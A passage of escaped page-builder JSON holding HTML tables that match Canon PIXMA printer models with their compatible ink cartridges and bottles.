width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E3170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E410<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4c78b87\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"71e2027\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E4270<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E470<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E477<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E480<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E510<\\/p><\\/td><td width=\\\"208\\\"><p>CL-98 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-88 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E560<\\/p><\\/td><td width=\\\"208\\\"><p>CL-99 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-89 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E560 \\/ E560R<\\/p><\\/td><td width=\\\"208\\\"><p>CL-99 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-89 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G1000<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G1010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G2010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G3000<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G3010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G4010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP100<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP110<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP110 (with battery)<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP1300<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP2770 \\/ iP2772<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP2870S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"13e8990\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"70107ac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP4200<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP7270<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP8770<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iX6770<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-755XXL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iX6870<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-755XXL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG2570S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG2577S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ac4d506\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"2645364\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62e0d92\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG3570<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG3670<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG7570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP160<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP180<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP228<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP237<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP245<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP258<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP276<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2be4aef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d0f60c7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td 